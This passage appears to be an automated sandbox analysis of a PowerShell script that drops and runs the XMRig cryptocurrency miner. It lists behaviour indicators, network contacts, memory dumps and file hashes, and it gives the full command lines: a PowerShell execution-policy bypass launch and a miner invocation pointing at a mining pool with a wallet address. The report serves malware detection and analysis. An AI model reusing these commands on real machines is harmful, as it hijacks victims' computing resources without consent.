| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3604 wrote to memory of 2692 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3604 wrote to memory of 2692 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.162.46.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.56.20.217.in-addr.arpa | udp |
Files
memory/3604-0-0x00007FFB689D3000-0x00007FFB689D4000-memory.dmp
memory/3604-5-0x00000206FB9B0000-0x00000206FB9D2000-memory.dmp
memory/3604-8-0x00007FFB689D0000-0x00007FFB693BC000-memory.dmp
memory/3604-9-0x00000206FC020000-0x00000206FC096000-memory.dmp
memory/3604-10-0x00007FFB689D0000-0x00007FFB693BC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_naoomkbw.q3h.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3604-25-0x00007FFB689D0000-0x00007FFB693BC000-memory.dmp
memory/3604-29-0x00007FFB689D3000-0x00007FFB689D4000-memory.dmp
memory/3604-30-0x00007FFB689D0000-0x00007FFB693BC000-memory.dmp
memory/3604-31-0x00007FFB689D0000-0x00007FFB693BC000-memory.dmp
memory/3604-64-0x00000206FBED0000-0x00000206FBEDA000-memory.dmp
memory/3604-51-0x00000206FBEE0000-0x00000206FBEF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2692-93-0x0000014F363F0000-0x0000014F36410000-memory.dmp
memory/2692-94-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-95-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-96-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-97-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-98-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-99-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-100-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-101-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-102-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-103-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-104-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-105-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-106-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-107-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-108-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-109-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-110-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-111-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-112-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-113-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-114-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-115-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-116-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-117-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-118-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-119-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-120-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp